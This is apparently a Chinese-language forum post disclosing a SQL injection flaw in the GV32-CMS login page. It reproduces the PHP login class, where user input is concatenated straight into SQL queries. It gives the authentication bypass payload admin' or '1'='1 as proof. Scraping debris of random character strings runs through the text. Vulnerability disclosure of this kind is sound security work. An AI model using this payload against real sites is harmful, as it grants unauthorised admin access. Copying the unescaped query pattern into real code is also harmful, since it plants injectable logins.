GV32CMS最新漏洞（暗月渗透测试团队原创）

admin

0x01 简要描述：
GV32-CMS免费开源企业建站系统，是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度，GV32-CMS企业建站系统已成国内外同类软件中的最好用的企业建站系统。
$ G2 H" `! M4 S0x02 详细说明：

• <?php
• if (!defined('GV32_COM')) exit('GV32.COM No direct script access allowed');
• class Login
• {
• function Login()
• {
• //echo 'Login';
• }
• function act( )
• {
• //缓存一天 //60 * 60 * 24 缓存时间 一天
• $GLOBALS['Templ'] -> caching = true;
• $GLOBALS['Templ'] -> cache_lifetime = 86400 ;
• $GLOBALS['Templ'] -> assign('copyright',COPYRIGHT); //版权
• $GLOBALS['Templ'] -> assign('actUrl',EMPLOYEE_WEBURL."/login.php?load=login&act=actlogin");
• $GLOBALS['Templ'] -> display('login_tpl.html');
• }
• function actlogin( )
• {
• echo $use_nameval = $GLOBALS['Reque'] -> funpost("use_name");
• $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
• $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");
• $this -> logincount();
• if($use_captchaval!=$_SESSION["Img"])
• {
• $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
• $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
• $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
• $GLOBALS['Templ'] -> display('suggestion_tpl.html');
• }else{
• $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
• //exit();
• $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);
• if($adminInfo["emplyeeUser"]["use_id"])
• {
• $GLOBALS['WebSe'] -> SetSession( $adminInfo );
• $nowtime = time();
• $adminip = $GLOBALS['Helpe'] -> getip();
• //登录成功更新用户信息
• $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
• $GLOBALS['MySql'] -> querySql($sqlup);
• //登录成功！重置IP错误信息清0！
• $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
• $GLOBALS['MySql'] -> querySql( $updateip );
• $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
• $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
• $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
• $GLOBALS['Templ'] -> display('suggestion_tpl.html');
• //var_dump($_SESSION);
• }else{
• $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
• $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
• $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
• $GLOBALS['Templ'] -> display('suggestion_tpl.html');
• /*
• header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act");
• exit();
• */
• }
• }
• }
• function logincount()
• {
• $adminip = $GLOBALS['Helpe'] -> getip();
• $now = time();
• if( $adminip!='Unknown' and $adminip!='' )
• {
• //查询记录是否存在
• $sqlip = " SELECT error_id , session_id , errorcount , start_time FROM ".SQL_PREFIX."loginerror WHERE ip_address = '".$adminip."' AND logtype = 'login' LIMIT 1 ";
• $useripInfo = $GLOBALS['MySql'] -> selectOne($sqlip);
• if($useripInfo["error_id"])
• {
• //超过一天。重置时间及数量
• if( $useripInfo["start_time"] > ( $now + 86400 ) )
• {
• $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET `session_id` = '".$_SESSION["session_id"]."' , start_time ='".$now."' ,errorcount = '1' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
• $GLOBALS['MySql'] -> querySql($updateip);
• }elseif( $useripInfo["errorcount"] >= 20 )
• {
• $updateip = "UPDATE `loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
• $GLOBALS['MySql'] -> querySql( $updateip );
• $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_tomorrowerror']);
• $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
• $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
• $GLOBALS['Templ'] -> display('suggestion_tpl.html');
• exit();
• }else{
• if( $useripInfo["errorcount"] < 5 )
• {
• $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
• $GLOBALS['MySql'] -> querySql($updateip);
• }elseif( $useripInfo["start_time"] > ( $now - 3600) )
• {
• $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
• $GLOBALS['MySql'] -> querySql($updateip);
• $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_counterror']);
• $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
• $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
• $GLOBALS['Templ'] -> display('suggestion_tpl.html');
• exit();
• }else{
• $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 ,session_id = '".$_SESSION["session_id"]."' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
• $GLOBALS['MySql'] -> querySql($updateip);
• }
• }
• //时间未超过1小时，状态有效，数量是否超过5次
• //未超过5次更新+1
• }else{
• $insertip ="INSERT INTO `".SQL_PREFIX."loginerror` (`session_id` , `errorcount` , `ip_address` , `start_time` , `logtype` ) VALUES ( '".$_SESSION["session_id"]."', '1', '$adminip', '$now', 'login')";
• $GLOBALS['MySql'] -> querySql($insertip);
• }
• }else{
• $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_syserror']);
• $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
• $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
• $GLOBALS['Templ'] -> display('suggestion_tpl.html');
• exit();
• }
• }
• }
• $Login = new Login();
• ?>
  

$ ~* v: V' n0 c& ^复制代码
经典语句重现

• $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
  ( k" m5 b) G8 X$ w4 f# y7 t1 B

3 s; N, l: m  y' K复制代码
$ d) f' D5 f# g6 x: z! b8 f原本以为注释就完事了 后来发现被过滤l 再看funpost函数

: R2 c( }: f9 I% Q

0x03 漏洞证明：
5 v! Z- l6 }; S6 G5 @& `1 w登录用户处填写 admin' or '1'='1
0 Q" t; Y2 D' f+ i9 V" ?

$ J9 Z$ m4 r% h( d7 K

2 R7 {% {5 X* G0 {